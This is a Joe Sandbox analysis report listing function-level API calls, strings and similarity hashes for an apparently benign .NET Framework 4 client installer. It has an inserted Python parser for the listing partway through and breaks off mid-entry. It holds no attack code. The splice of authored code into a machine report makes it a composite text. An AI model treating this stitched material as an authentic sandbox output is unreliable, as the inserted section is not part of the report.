• Opcode ID: 030734fbb11974196d914fffe7de86e68d6823660ba7b12b2ee9e7f0fb553ea9
• Instruction ID: cec809136959f539b67a6b5457b8b45be7fa04313c4ff6f2cbce3d251d2ab386
• Opcode Fuzzy Hash: 030734fbb11974196d914fffe7de86e68d6823660ba7b12b2ee9e7f0fb553ea9
• Instruction Fuzzy Hash: EA317F76D04119EFDB20AFA4DD988EDBBB4EF08310B168179EE06E7211D3359E90DB90
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

APIs
• GetFileAttributesW.KERNELBASE(00000000,?,00000000,X?f,?,?,?,00016F20,?,00000000,?,?,00000000,?,?,00015B53), ref: 000191F9
• CreateDirectoryW.KERNELBASE(00000000,?,?,?,00016F20,?,00000000,?,?,00000000,?,?,00015B53,?,?,?), ref: 00019210
• GetLastError.KERNEL32(?,?,00016F20,?,00000000,?,?,00000000,?,?,00015B53,?,?,?,?,?), ref: 0001921E
  • Part of subcall function 000191D3: CreateDirectoryW.KERNEL32(00000000,?,?,?,00016F20,?,00000000,?,?,00000000,?,?,00015B53,?,?,?), ref: 00019273
  • Part of subcall function 000191D3: GetLastError.KERNEL32(?,?,00016F20,?,00000000,?,?,00000000,?,?,00015B53,?,?,?,?,?), ref: 0001927D
Strings
Memory Dump Source
• Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
• Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
Similarity
• API ID: CreateDirectoryErrorLast$AttributesFile
• String ID: X?f
• API String ID: 925696554-1642154059
• Opcode ID: 1afe118882c5534934998dbeb75c1966792391de6342ac66b830af6b28fbc223
• Instruction ID: e9c25d9847d0c7023deab4257baabedb53d761379d1aa32f085ccfcdb5b062bf
• Opcode Fuzzy Hash: 1afe118882c5534934998dbeb75c1966792391de6342ac66b830af6b28fbc223
• Instruction Fuzzy Hash: 83210137900202BBEB611B64DC65BFA36EAEF943A0F354029FD45D7051DA7ACEC29350
Uniqueness
Uniqueness Score: -1.00%

APIs
• ___set_flsgetvalue.LIBCMT ref: 000337D4
• __calloc_crt.LIBCMT ref: 000337E0
• __getptd.LIBCMT ref: 000337ED
• CreateThread.KERNELBASE(?,?,00033745,00000000,?,?), ref: 00033824
• GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 0003382E
• _free.LIBCMT ref: 00033837
• __dosmaperr.LIBCMT ref: 00033842
  • Part of subcall function 0002B059: __getptd_noexit.LIBCMT ref: 0002B059
Memory Dump Source
• Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
• Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
Similarity
• API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
• String ID:
• API String ID: 155776804-0
• Opcode ID: 6a52e6af007c1ad93a84d91444e3ed87de97e5c3ab600e886a12b87497a944cf
• Instruction ID: 0fb4fb11de056c88914c17a8436c0497cbb3d14d7db20976642412863178bec1
• Opcode Fuzzy Hash: 6a52e6af007c1ad93a84d91444e3ed87de97e5c3ab600e886a12b87497a944cf
• Instruction Fuzzy Hash: D31125726043166FE722AFA5FCC69DB3BDCDF05770B104425FA1497152DF71CA008661
Uniqueness
Uniqueness Score: -1.00%

APIs
• EnterCriticalSection.KERNEL32(0003BF10,00000000,?,000163FA,?,00000000,00000002,?,?,?,?,?,?,?,00015B83,X?f), ref: 0001691B
• LeaveCriticalSection.KERNEL32(0003BF10,?,00000000,00000002,?,?,?,?,?,?,?,00015B83,X?f), ref: 0001692C
• PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00016940
• WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00000002,?,?,?,?,?,?,?,00015B83,X?f), ref: 00016952
• DeleteCriticalSection.KERNEL32(0003BF10,00000000,?,000163FA,?,00000000,00000002,?,?,?,?,?,?,?,00015B83,X?f), ref: 0001696D
• CloseHandle.KERNEL32(?,00000000,?,000163FA,?,00000000,00000002,?,?,?,?,?,?,?,00015B83,X?f), ref: 00016998
• CloseHandle.KERNEL32(?,00000000,?,000163FA,?,00000000,00000002,?,?,?,?,?,?,?,00015B83,X?f), ref: 000169A4
Memory Dump Source
• Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
• Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
Similarity
• API ID: CriticalSection$CloseHandle$DeleteEnterLeaveMessageObjectPostSingleWait
• String ID:
• API String ID: 2807184951-0
• Opcode ID: ad281c751e2e3e0d9971c124c21c1d5bac4ae61d026e327b3b0c9353284b5915
• Instruction ID: 8dd0c3e25fb881344a839b0c6783bb9414c61542761a51840b683c988f3812ba
• Opcode Fuzzy Hash: ad281c751e2e3e0d9971c124c21c1d5bac4ae61d026e327b3b0c9353284b5915
• Instruction Fuzzy Hash: 91118E30900150DBF7678B69ED88CDA77EEB795751728460AF610F3224D7BE48C08F60
Uniqueness
Uniqueness Score: -1.00%

APIs
• ___set_flsgetvalue.LIBCMT ref: 0003374B
  • Part of subcall function 0002A57F: TlsGetValue.KERNEL32(?,00033750), ref: 0002A588
  • Part of subcall function 0002A57F: _DecodePointerInternal@4.DOTNETFX40_CLIENT_SETUP(?,00033750), ref: 0002A59A
  • Part of subcall function 0002A57F: TlsSetValue.KERNEL32(00000000,?,00033750), ref: 0002A5A9
• ___fls_getvalue@4.LIBCMT ref: 00033756
  • Part of subcall function 0002A555: TlsGetValue.KERNEL32(?,?,0003375B,00000000), ref: 0002A563
• ___fls_setvalue@8.LIBCMT ref: 00033769
  • Part of subcall function 0002A5B8: _DecodePointerInternal@4.DOTNETFX40_CLIENT_SETUP(?,?,?,0003376E,00000000,?,00000000), ref: 0002A5C9
• GetLastError.KERNEL32(00000000,?,00000000), ref: 00033772
• ExitThread.KERNEL32 ref: 00033779
• GetCurrentThreadId.KERNEL32 ref: 0003377F
• __freefls@4.LIBCMT ref: 0003379F
Memory Dump Source
• Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
• Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
Similarity
• API ID: Value$DecodeInternal@4PointerThread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
• String ID:
• API String ID: 3864649970-0
• Opcode ID: 95e0b4155f522b89a92c03b95d43c594c67fb882f21d00026704fbd160b3521d
• Instruction ID: bc902b596576bba78cbebe8e2295d28faf8a99610b084f8569c6d92690cec83d
• Opcode Fuzzy Hash: 95e0b4155f522b89a92c03b95d43c594c67fb882f21d00026704fbd160b3521d
• Instruction Fuzzy Hash: 21F062B4900660AFC719BF71E9498CFBBADAF493047108518F5048B213DE38D94286A2
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetProcessHeap.KERNEL32(00000008,00000038,00000000,?,00000000,?,00000008,00000008,?,00016163,?,?,?,00000000,00000000), ref: 00019E0D
• HeapAlloc.KERNEL32(00000000,?,00016163,?,?,?,00000000,00000000), ref: 00019E14
Memory Dump Source
• Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
• Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
Similarity
• API ID: Heap$AllocProcess
• String ID:
• API String ID: 1617791916-0
• Opcode ID: 1395625c5b7d56eb910706fb7b0e19394f9f3ca0da9d15b69780dba14cc5c7e4
• Instruction ID: f43e6c44cbe4b59b7dd1281c06b4373b27e52a74c6fb68904ff34990f286b552
• Opcode Fuzzy Hash: 1395625c5b7d56eb910706fb7b0e19394f9f3ca0da9d15b69780dba14cc5c7e4
• Instruction Fuzzy Hash: 8031D2366002059FDF15DFA4C894ADA77E5AF84360B268429F9099F242EB75EC81CB60
Uniqueness
Uniqueness Score: -1.00%
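The function entries above share one layout: an "APIs" list of call sites (each "Name.MODULE(args), ref: address", with nested "Part of subcall function X:" lines for callees), followed by key/value lines such as "String ID", "Opcode ID" and "Instruction Fuzzy Hash". When triaging a report like this one it helps to pull that listing into structured records so API sequences can be queried instead of read by eye. The parser below is an added example written for this page; it is not Joe Sandbox code and makes no claim about how the sandbox computes its IDs or hashes. Its sample input is constructed from two of the entries on this page (the directory-creation helper and the CreateThread wrapper), with the unrelated lines of each entry omitted; `parse_entries`, `api_sequence` and `find_entries_calling` are names chosen here.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Set

# Constructed sample input: two "APIs" entries in the layout used by the listing
# above. The call lines and IDs are copied from the report; other lines are omitted.
SAMPLE = """\
APIs
• GetFileAttributesW.KERNELBASE(00000000,?,00000000,X?f,?,?,?,00016F20,?,00000000,?,?,00000000,?,?,00015B53), ref: 000191F9
• CreateDirectoryW.KERNELBASE(00000000,?,?,?,00016F20,?,00000000,?,?,00000000,?,?,00015B53,?,?,?), ref: 00019210
• GetLastError.KERNEL32(?,?,00016F20,?,00000000,?,?,00000000,?,?,00015B53,?,?,?,?,?), ref: 0001921E
  • Part of subcall function 000191D3: CreateDirectoryW.KERNEL32(00000000,?,?,?,00016F20,?,00000000,?,?,00000000,?,?,00015B53,?,?,?), ref: 00019273
  • Part of subcall function 000191D3: GetLastError.KERNEL32(?,?,00016F20,?,00000000,?,?,00000000,?,?,00015B53,?,?,?,?,?), ref: 0001927D
Strings
Memory Dump Source
• Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
Similarity
• API ID: CreateDirectoryErrorLast$AttributesFile
• String ID: X?f
• API String ID: 925696554-1642154059
• Opcode ID: 1afe118882c5534934998dbeb75c1966792391de6342ac66b830af6b28fbc223
Uniqueness
Uniqueness Score: -1.00%
APIs
• ___set_flsgetvalue.LIBCMT ref: 000337D4
• CreateThread.KERNELBASE(?,?,00033745,00000000,?,?), ref: 00033824
• GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 0003382E
• _free.LIBCMT ref: 00033837
  • Part of subcall function 0002B059: __getptd_noexit.LIBCMT ref: 0002B059
Similarity
• API ID: CreateErrorLastThread___set_flsgetvalue__getptd_noexit_free
• String ID:
• API String ID: 155776804-0
• Opcode ID: 6a52e6af007c1ad93a84d91444e3ed87de97e5c3ab600e886a12b87497a944cf
Uniqueness
Uniqueness Score: -1.00%
"""

# One call-site line: optional "Part of subcall function X:" prefix, "Name.MODULE",
# optional "(args)", then "ref: address". CRT helpers (LIBCMT) have no argument list.
API_LINE = re.compile(
    r"^\s*•\s*"
    r"(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[\w@]+)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
# "• Key: value" or a bare "Key: value" line (as in "Uniqueness Score: -1.00%").
KV_LINE = re.compile(r"^\s*(?:•\s*)?(?P<key>[^:•]+?):\s*(?P<value>.*?)\s*$")


@dataclass
class ApiCall:
    name: str
    module: str
    args: tuple
    ref: int                          # address of the call site
    subcall_of: Optional[str] = None  # callee address for "Part of subcall function" lines


@dataclass
class FunctionEntry:
    apis: List[ApiCall] = field(default_factory=list)
    meta: Dict[str, str] = field(default_factory=dict)


def parse_entries(text: str) -> List[FunctionEntry]:
    """Split a function listing into one FunctionEntry per 'APIs' block."""
    entries: List[FunctionEntry] = []
    in_apis = False
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line == "APIs":            # every entry starts with its API list
            entries.append(FunctionEntry())
            in_apis = True
            continue
        if not entries:
            continue                  # text before the first entry carries nothing
        m = API_LINE.match(raw) if in_apis else None
        if m:
            args = tuple(a.strip() for a in m.group("args").split(",")) if m.group("args") else ()
            entries[-1].apis.append(ApiCall(m.group("name"), m.group("module"), args,
                                            int(m.group("ref"), 16), m.group("sub")))
            continue
        in_apis = False               # first non-call line closes the API list
        kv = KV_LINE.match(line)
        if kv:                        # bare headings (Strings, Similarity, ...) are skipped
            entries[-1].meta[kv.group("key").strip()] = kv.group("value")
    return entries


def api_sequence(entry: FunctionEntry, include_subcalls: bool = False) -> List[str]:
    """API names in call-site address order; nested callee lines are excluded by default."""
    calls = [c for c in entry.apis if include_subcalls or c.subcall_of is None]
    return [c.name for c in sorted(calls, key=lambda c: c.ref)]


def find_entries_calling(entries: List[FunctionEntry], required: Set[str]) -> List[FunctionEntry]:
    """Entries whose own (non-subcall) API set contains every name in `required`."""
    return [e for e in entries if required <= {c.name for c in e.apis if c.subcall_of is None}]


if __name__ == "__main__":
    for e in parse_entries(SAMPLE):
        print(e.meta.get("Opcode ID", "")[:16], "->", " ".join(api_sequence(e)))
```

Ordering by `ref` matters more than it looks: the report prints call sites in address order already, but once entries from several functions are merged (for example to hunt for every function that pairs `CreateThread` with `GetLastError`, or `CreateDirectoryW` with a recursive self-call) the address is the only stable key, and the "Part of subcall function" lines must be kept apart from the function's own calls or the sequence of a wrapper and its callee blur together.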

APIs
• _memset.LIBCMT ref: 0001B9AC
• _strcpy_s.LIBCMT ref: 0001B9BD
  • Part of subcall function 0001B580: __get_errno.LIBCMT ref: 0001B58E
Strings
Memory Dump Source
• Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
• Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
Similarity
                                                                                                                                                                    • API ID: __get_errno_memset_strcpy_s
                                                                                                                                                                    • String ID: @
                                                                                                                                                                    • API String ID: 179418724-2766056989
                                                                                                                                                                    • Opcode ID: 605acbeb8f46037ca42e8bfb19db844bb3352d6454acdee50fc170765d7ece9b
                                                                                                                                                                    • Instruction ID: 49f276a752ed8a28f9dcaf86883ebf10cc0e35b9070a27a9d1ae3a7ca6dedd86
                                                                                                                                                                    • Opcode Fuzzy Hash: 605acbeb8f46037ca42e8bfb19db844bb3352d6454acdee50fc170765d7ece9b
                                                                                                                                                                    • Instruction Fuzzy Hash: 698189B5504601AFC710EF64D88499AFBF4FF88324F108A1DF9999B262D771ED81CB92
Uniqueness

Uniqueness Score: -1.00%

APIs
• UuidCreate.RPCRT4(?), ref: 00017496
• UuidToStringW.RPCRT4(?,00000000), ref: 000174C3
• RpcStringFreeW.RPCRT4(00000000), ref: 000174FF
Strings
• Failed to create a new GUID., xrefs: 000174B4
• Failed to convert GUID to string., xrefs: 000174D7
Memory Dump Source
• Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
• Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
Similarity
• API ID: StringUuid$CreateFree
• String ID: Failed to convert GUID to string.$Failed to create a new GUID.
• API String ID: 3044360575-1364151769
• Opcode ID: d34b0f824eded9b8a8b3467df63e91c42a0bb5e3dd2e1b7cacbceab3950d1f16
• Instruction ID: 5f7d3ef53799f3dc9c29169406a71f98a50488f9069e30969bfcace7cc6d2a25
• Opcode Fuzzy Hash: d34b0f824eded9b8a8b3467df63e91c42a0bb5e3dd2e1b7cacbceab3950d1f16
• Instruction Fuzzy Hash: BA119672B1421AABDB109FF9DC45AEFB7F9AB48310F104435E605E3151DB78D8848B90
Uniqueness

Uniqueness Score: -1.00%

APIs
• _malloc.LIBCMT ref: 00033600
  • Part of subcall function 0002CDB5: __FF_MSGBANNER.LIBCMT ref: 0002CDCE
  • Part of subcall function 0002CDB5: __NMSG_WRITE.LIBCMT ref: 0002CDD5
  • Part of subcall function 0002CDB5: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,0002DBEB,?,00000001,?,?,0002D143,00000018,00036FA0,0000000C,0002D1D8), ref: 0002CDFA
• std::exception::exception.LIBCMT ref: 00033635
• std::exception::exception.LIBCMT ref: 0003364F
• __CxxThrowException@8.LIBCMT ref: 00033660
Strings
Memory Dump Source
• Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
• Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
Similarity
• API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
• String ID: bad allocation
• API String ID: 615853336-2104205924
• Opcode ID: 9e73bc6a61cddae4e92fc84b75d5abf62e238a40288cca4e8fc36d9a468be667
• Instruction ID: 6d3d4d75e7fcd03e0687f20339b8ed56e3e43c1cce74ce8f1f19729b8fb16694
• Opcode Fuzzy Hash: 9e73bc6a61cddae4e92fc84b75d5abf62e238a40288cca4e8fc36d9a468be667
• Instruction Fuzzy Hash: 53014932904619ABDB16FB68DC87AEE7BFC9F80318F14001AF60497192DBB88F45C340
Uniqueness

Uniqueness Score: -1.00%

APIs
• lstrlenA.KERNEL32(00000000,00000004,?,?,0003C170,?,?,?,?,000184C0,?,?,00000000,?,00018526,?), ref: 00018738
• WriteFile.KERNELBASE(00000000,00000004,00000004,00000000,?,?,?,000184C0,?,?,00000000,?,00018526,?,[%s] ,0003C170), ref: 00018762
• WriteFile.KERNELBASE(00014DA4,00000002,00000004,00000000,?,?,?,000184C0,?,?,00000000,?,00018526,?,[%s] ,0003C170), ref: 00018787
• GetLastError.KERNEL32(?,?,?,000184C0,?,?,00000000,?,00018526,?,[%s] ,0003C170,0003C170,00000032,%u/%u/%u, %u:%u:%u,?), ref: 0001878D
• GetLastError.KERNEL32(?,?,?,000184C0,?,?,00000000,?,00018526,?,[%s] ,0003C170,0003C170,00000032,%u/%u/%u, %u:%u:%u,?), ref: 000187BE
Memory Dump Source
• Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
• Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
Similarity
• API ID: ErrorFileLastWrite$lstrlen
• String ID:
• API String ID: 3048800281-0
• Opcode ID: 4b7e0da985b998245e54de9317e35e2ac7a8feaab19c8818a802bf020b3be1e8
• Instruction ID: dbeaaceb142383e10be789d38f527c27b684b4dbd931977d70c4b3fb727d3b15
• Opcode Fuzzy Hash: 4b7e0da985b998245e54de9317e35e2ac7a8feaab19c8818a802bf020b3be1e8
• Instruction Fuzzy Hash: 41211771900209FFDB119F66DC499EEBBB9EF44390F24C425E919DB150D639DB809B50
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 000335E6: _malloc.LIBCMT ref: 00033600
  • Part of subcall function 0001CA78: GetSystemInfo.KERNELBASE(?), ref: 0001CACB
• _memset.LIBCMT ref: 0001BDC4
• _strcpy_s.LIBCMT ref: 0001BDCE
• _strcat_s.LIBCMT ref: 0001BDD8
  • Part of subcall function 0001B580: __get_errno.LIBCMT ref: 0001B58E
Strings
Memory Dump Source
• Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
• Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
Similarity
• API ID: InfoSystem__get_errno_malloc_memset_strcat_s_strcpy_s
• String ID: W
• API String ID: 3172754772-655174618
• Opcode ID: 70fc79d1ec33d24d917198c8a106db9017c7b0c90d917bdf5edec812a8221e85
• Instruction ID: 7e989f8df03db48ff08b92da858a476b1503db98be776c834ffa52edbacb4f3d
• Opcode Fuzzy Hash: 70fc79d1ec33d24d917198c8a106db9017c7b0c90d917bdf5edec812a8221e85
• Instruction Fuzzy Hash: 73916D31A00205EFCB15DFA9C884AEEBBF5AF89710F248559F505AB291EB71D981CB90
Uniqueness

Uniqueness Score: -1.00%

APIs
• _memset.LIBCMT ref: 000176D2
• QueryDosDeviceW.KERNELBASE(?,?,00000400,?,00000000,?), ref: 000176EB
Strings
Memory Dump Source
• Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
• Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
Similarity
• API ID: DeviceQuery_memset
• String ID: harddisk$ramdisk
• API String ID: 2562551966-3524468269
• Opcode ID: 0e9cf91bfa49111d4f1263d53482045229b80918ae1396bdb85e20d22f08b4ec
• Instruction ID: ac962a917971d8e4d46f84e74ae1fb23a82fcc04caa6b1c4d4c142e5a28ef0f1
• Opcode Fuzzy Hash: 0e9cf91bfa49111d4f1263d53482045229b80918ae1396bdb85e20d22f08b4ec
• Instruction Fuzzy Hash: 1611E33AE04218AADB51DFB5EC01ADE73FCBF04314F1080A6E508E7141EA349B498B94
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetModuleHandleW.KERNEL32(00000000,00000024,000164D8,?,0001654C,?,00000024,?,0001AFDF,00000007,?,?,00000000,00000000,?,?), ref: 00016616
• SendMessageW.USER32(00008001,00000000,00000000,00000000), ref: 00016683
Strings
• Failed to add file name on to status prefix: %S, xrefs: 00016654
• %s..., xrefs: 0001668B
Memory Dump Source
• Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
• Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: HandleMessageModuleSend
                                                                                                                                                                    • String ID: %s...$Failed to add file name on to status prefix: %S
                                                                                                                                                                    • API String ID: 1379669478-1181359081
                                                                                                                                                                    • Opcode ID: 9f4ca4de55be5eab228960ba1c6acc60e415be91212a4381590bc9b1f7f967e3
                                                                                                                                                                    • Instruction ID: 754825f0f2cc0b165dbba5f361323528bf87f8349fe1cbc59339ad0d49230f68
                                                                                                                                                                    • Opcode Fuzzy Hash: 9f4ca4de55be5eab228960ba1c6acc60e415be91212a4381590bc9b1f7f967e3
                                                                                                                                                                    • Instruction Fuzzy Hash: 91119E71802214FFFF229B50DD46DEE7FBAAB12B48B104015F804B6022D77B9BD0AB94
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3_memmove
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1268875249-3916222277
                                                                                                                                                                    • Opcode ID: 7281ecfdba60d79ab0859f5d58c8de7fae80317cc80739e0d6177210195faec5
                                                                                                                                                                    • Instruction ID: 1dfb16369be20d2b619ce7ac09ad119fbcb69ba72740b89f367d3237678963fa
                                                                                                                                                                    • Opcode Fuzzy Hash: 7281ecfdba60d79ab0859f5d58c8de7fae80317cc80739e0d6177210195faec5
                                                                                                                                                                    • Instruction Fuzzy Hash: F2513B71E002599BDF14DFA8DC81AEEB7F5FF48354F244529EC55A7242D730AE818BA0
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • SetFileAttributesW.KERNELBASE(?,00000080,?,00000024,?,0001AFDF,00000007,?,?,00000000,00000000,?,?,?), ref: 00016560
                                                                                                                                                                    Strings
                                                                                                                                                                    • Unable ro register file for clean-up, xrefs: 00016574
                                                                                                                                                                    • User canceled extraction..., xrefs: 000165BB
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmpDownload File
